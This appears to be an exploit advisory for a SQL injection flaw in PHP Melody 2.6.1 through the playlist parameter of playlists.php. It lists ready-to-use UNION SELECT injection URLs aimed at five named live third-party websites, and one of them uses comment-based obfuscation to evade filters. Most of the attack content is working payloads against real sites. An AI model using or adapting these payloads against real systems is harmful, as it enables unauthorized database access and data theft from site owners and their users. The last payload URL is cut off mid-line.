PHP Melody 2.6.1 SQL Injection

PHP Melody version 2.6.1 suffers from a remote SQL injection vulnerability.


MD5 | d1030b2d22474e4e4a43dd856b933af5

---------------------------------------------------
PHP Melody 2.6.1 SQL Injection
---------------------------------------------------
###################################################
[+] Author : Venkat Rajgor
[+] Email : Venki9990@gmail.com
[+] Vulnerability : SQL injection
###################################################

---------info Cms----------------
name : PHP Melody version 2.6.1
email : support@phpsugar.com
dowloand : http://www.phpsugar.com
web : http://www.phpsugar.com
price : $39 USD

Vulnerable parameter: playlists.php?playlist='

Demo Sites:

[+] http://www.donlugo.tv/playlists.php?playlist=-1276' UNION SELECT
null,concat(0x223c2f613e3c2f6469763e3c2f6469763e,version(),0x3c212d2d),
null,null,null,null,null,null,null,null,null-- -

[+] http://www.businessfight.com/playlists.php?playlist=-1276' UNION SELECT
null,concat(0x223c2f613e3c2f6469763e3c2f6469763e,version(),0x3c212d2d),
null,null,null,null,null,null,null,null,null-- -

[+] http://www.salsamalsa.com/playlists.php?playlist=-1276' UNION SELECT
null,concat(0x223c2f613e3c2f6469763e3c2f6469763e,version(),0x3c212d2d),
null,null,null,null,null,null,null,null,null-- -

[+] http://www.mathstube.org.uk/playlists.php?playlist=-1276' UNION SELECT
null,concat(0x223c2f613e3c2f6469763e3c2f6469763e,version(),0x3c212d2d),
null,null,null,null,null,null,null,null,null-- -

[+] http://www.hahuvideos.info/playlists.php?playlist=-1276'
/*!00000UNION*/ /*!00000SELECT*/ null,concat+(0x223c2f613e3c2f6469763e3c2f64
69763e,version(),0x3c212d2d),null,null,null,null,null,

Related Posts

Comments